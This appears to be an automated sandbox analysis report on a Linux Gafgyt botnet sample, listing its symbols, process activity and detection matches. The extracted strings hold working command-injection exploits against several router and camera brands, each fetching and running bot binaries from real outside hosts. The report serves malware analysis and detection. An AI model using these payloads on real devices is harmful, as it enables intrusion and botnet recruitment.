unknown.1274	.symtab	0x41f160	14	OBJECT	<unknown>	DEFAULT	4
unlink	.symtab	0x419244	60	FUNC	<unknown>	DEFAULT	2
unlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
unsafe_state	.symtab	0x43026c	20	OBJECT	<unknown>	DEFAULT	10
update_bins	.symtab	0x413200	420	FUNC	<unknown>	DEFAULT	2
update_process	.symtab	0x404120	4	FUNC	<unknown>	DEFAULT	2
updating	.symtab	0x430680	4	OBJECT	<unknown>	DEFAULT	12
util.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
util_atoi	.symtab	0x4133c0	380	FUNC	<unknown>	DEFAULT	2
util_isalpha	.symtab	0x413140	24	FUNC	<unknown>	DEFAULT	2
util_isdigit	.symtab	0x413160	12	FUNC	<unknown>	DEFAULT	2
util_itoa	.symtab	0x413540	244	FUNC	<unknown>	DEFAULT	2
util_local_addr	.symtab	0x413180	128	FUNC	<unknown>	DEFAULT	2
util_memcpy	.symtab	0x413100	20	FUNC	<unknown>	DEFAULT	2
util_strcat	.symtab	0x413080	64	FUNC	<unknown>	DEFAULT	2
util_strcpy	.symtab	0x4130c0	50	FUNC	<unknown>	DEFAULT	2
util_strlen	.symtab	0x413060	24	FUNC	<unknown>	DEFAULT	2
util_zero	.symtab	0x413120	20	FUNC	<unknown>	DEFAULT	2
vsnprintf	.symtab	0x41444c	180	FUNC	<unknown>	DEFAULT	2
vsnprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
w	.symtab	0x43070c	4	OBJECT	<unknown>	DEFAULT	12
waitpid	.symtab	0x41b320	172	FUNC	<unknown>	DEFAULT	2
wcrtomb	.symtab	0x419638	68	FUNC	<unknown>	DEFAULT	2
wcrtomb.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsnrtombs	.symtab	0x41969c	124	FUNC	<unknown>	DEFAULT	2
wcsnrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsrtombs	.symtab	0x41967c	32	FUNC	<unknown>	DEFAULT	2
wcsrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
write	.symtab	0x4181c0	172	FUNC	<unknown>	DEFAULT	2
x	.symtab	0x430700	4	OBJECT	<unknown>	DEFAULT	12
xstatconv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
y	.symtab	0x430704	4	OBJECT	<unknown>	DEFAULT	12
z	.symtab	0x430708	4	OBJECT	<unknown>	DEFAULT	12

Network Behavior

⊘Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

System Behavior

Analysis Process: cN7jzEkjeq.elf PID: 5438, Parent PID: 5359

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	/tmp/cN7jzEkjeq.elf
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/cN7jzEkjeq.elf bin/busybox; chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/usr/bin/rm
Arguments:	rm -rf bin/busybox
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir bin
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/usr/bin/mv
Arguments:	mv /tmp/cN7jzEkjeq.elf bin/busybox
File size:	149888 bytes
MD5 hash:	504f0590fa482d4da070a702260e3716

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/usr/bin/chmod
Arguments:	chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5451, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5455, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5457, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5458, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5460, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5462, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5464, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5468, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5472, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5474, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5476, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5478, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5480, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5482, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5484, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5485, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5488, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5490, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5492, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5495, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: cN7jzEkjeq.elf PID: 5496, Parent PID: 5446

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/cN7jzEkjeq.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Source: cN7jzEkjeq.elf	Virustotal: Detection: 57%			Perma Link
Source: cN7jzEkjeq.elf	ReversingLabs: Detection: 52%

Source: cN7jzEkjeq.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown

Source: ELF static info symbol of initial sample	Name: attack.c
Source: ELF static info symbol of initial sample	Name: attack_get_opt_int
Source: ELF static info symbol of initial sample	Name: attack_get_opt_ip
Source: ELF static info symbol of initial sample	Name: attack_init
Source: ELF static info symbol of initial sample	Name: attack_kill_all
Source: ELF static info symbol of initial sample	Name: attack_method_nudp
Source: ELF static info symbol of initial sample	Name: attack_method_stdhex
Source: ELF static info symbol of initial sample	Name: attack_method_tcp
Source: ELF static info symbol of initial sample	Name: attack_ongoing
Source: ELF static info symbol of initial sample	Name: attack_parse

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+vaicalon;chmod+777+*;sh+vaicalon+gpon.selfrep`&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+anngu;chmod+777+*;sh+anngu+gpon.selfrep`&ipv=0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://104.244.74.231/mips -O .0721; /bin/busybox chmod 777 .0721; ./.0721 huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: bin/busybox
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+vaicalon;chmod+777+*;sh+vaicalon+gpon.selfrep`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+anngu;chmod+777+*;sh+anngu+gpon.selfrep`&ipv=0POST /HNAP1/ HTTP/1.0
Source: Initial sample	String containing 'busybox' found: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Ares.mpsl%3B+wget%20http%3A%2F%2F104.244.74.231%2Fmpsl%20-O%20.0721%3B%20chmod%20777%20.0721%3B%20.%2F.0721%20link.selfrep%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f

Source: Initial sample	Potential command found: GET /device.rsp?opt=sys&cmd=_S_O_S_T_R_E_A_MAX_&mdb=sos&mdc=uname%20-a%3Bwget%20http%3A%2F%2F15.235.163.157%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20TBKDvR HTTP/1.1
Source: Initial sample	Potential command found: GET /ping.cgi?pingIpAddress=google.fr%3Bwget%20http%3A%2F%2F104.244.74.231%2Fmips%20-O%20.0721%3Bchmod%20777%20.0721%3B.%2F.0721 HTTP/1.1
Source: Initial sample	Potential command found: GET /login.cgi?cli=aa%20aa%27%3Bwget%20http%3A%2F%2F104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20dlink%27%24 HTTP/1.1
Source: Initial sample	Potential command found: GET /
Source: Initial sample	Potential command found: GET /shell?cd%20%2Ftmp%3Brm%20-rf%20*%3Bwget%20104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bchmod%20777%20.072l%3Bsh%20.072l%20jaws HTTP/1.1
Source: Initial sample	Potential command found: GET /login.cgi?cli=aa%20aa%27%3Bwget%20http%3A%2F%2F104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20dlink%27%24 HTTP/1.1
Source: Initial sample	Potential command found: GET /HEAD /POST /HTTP/1.1 404 Not FoundServer: Apache %d
Source: Initial sample	Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample	Potential command found: GET /debugging_center_utils_.php?log=%3Bwget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fjack5tr.selfrep.sh%20-O-%20%7C%20sh%20nuuo HTTP/1.1
Source: Initial sample	Potential command found: GET /debugging_center_utils_.php?log=%3Bwget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fjack5tr.selfrep.sh%20-O-%20%7C%20sh%20nuuo HTTP/1.1w5q6he3dbrsgmclkiu4to18npavj702fPOST /picdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /index.php?s=/index/hink
Source: Initial sample	Potential command found: GET /%s HTTP/1.0

Source: cN7jzEkjeq.elf	String: %7B%22hostname%22%3A%20%221%27wget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20totolin.selfrep%3Becho%27%22%2C%20%22dhcpMtu%22%3A%20%221500%22%2C%20%22proto%22%3A%209%2C%20%22dnsMode%22%3A%20%220%22%2C%20%22ttlWay%22%3A%20%221%22%2C%20%22lcpEchoEnable%22%3A%20%221%22%2C%20%22clone%22%3A%20%220%22%2C%20%22cloneMac%22%3A%20%221C%3AF4%3A08%3A53%3A15%3A60%22%2C%20%22topicurl%22%3A%20%22setWanCfg%22%2C%20%22token%22%3A%20%229d48f879b6940d711cd1449c6f4b4186%22%7D
Source: cN7jzEkjeq.elf	String: %7B%22hostname%22%3A%20%221%27wget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20totolin.selfrep%3Becho%27%22%2C%20%22dhcpMtu%22%3A%20%221500%22%2C%20%22proto%22%3A%209%2C%20%22dnsMode%22%3A%20%220%22%2C%20%22ttlWay%22%3A%20%221%22%2C%20%22lcpEchoEnable%22%3A%20%221%22%2C%20%22clone%22%3A%20%220%22%2C%20%22cloneMac%22%3A%20%221C%3AF4%3A08%3A53%3A15%3A60%22%2C%20%22topicurl%22%3A%20%22setWanCfg%22%2C%20%22token%22%3A%20%229d48f879b6940d711cd1449c6f4b4186%22%7DPOST /cgi-bin/cstecgi.cgi HTTP/1.1

Source: cN7jzEkjeq.elf	String found in binary or memory: http://0.0.0.0/bins/sora.mips;
Source: cN7jzEkjeq.elf	String found in binary or memory: http://104.244.74.231/jack5tr.selfrep.sh
Source: cN7jzEkjeq.elf	String found in binary or memory: http://104.244.74.231/mips
Source: cN7jzEkjeq.elf	String found in binary or memory: http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$
Source: cN7jzEkjeq.elf	String found in binary or memory: http://104.244.74.231/x86
Source: cN7jzEkjeq.elf	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: cN7jzEkjeq.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: cN7jzEkjeq.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: cN7jzEkjeq.elf	String found in binary or memory: http://woshishabi.zzy.rip/wget.sh$
Source: cN7jzEkjeq.elf	String found in binary or memory: http://woshishabi.zzy.rip/x86

Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: asus_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: asus_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: dlinkscanner_fake_time
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: dlinkscanner_rsck
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: dlinkscanner_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: dlinkscanner_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: dlinkscanner_setup_connection
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: hexPayload
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: hnapscanner_fake_time
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: hnapscanner_rsck
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: hnapscanner_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: hnapscanner_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: hnapscanner_setup_connection
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: huawei_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: huawei_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: lblink_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: lblink_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: linksys_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: linksys_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: nuuo_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: nuuo_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: realtekscanner_fake_time
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: realtekscanner_rsck
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: realtekscanner_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: realtekscanner_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: realtekscanner_setup_connection
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: scanner_init
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: totolink_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: totolink_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: tplink_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: tplink_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: tr064_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: tr064_scanner_rawpkt
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: tvt_scanner_pid
Source: cN7jzEkjeq.elf	ELF static info symbol of initial sample: tvt_scanner_rawpkt

Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/5383/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/230/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/110/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/231/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/232/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/112/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/233/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/113/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/234/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/114/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/235/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/115/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/236/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/116/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/237/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/117/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/238/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/118/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/239/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/119/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/914/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/10/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/917/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/12/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/13/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/14/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/15/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/16/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/17/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/5278/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/18/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/3772/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/19/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/240/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/3095/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/120/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/241/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/121/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/242/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/122/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/243/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/2/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/123/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/244/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/3/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/124/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/245/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/1588/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/125/cmdline	Jump to behavior
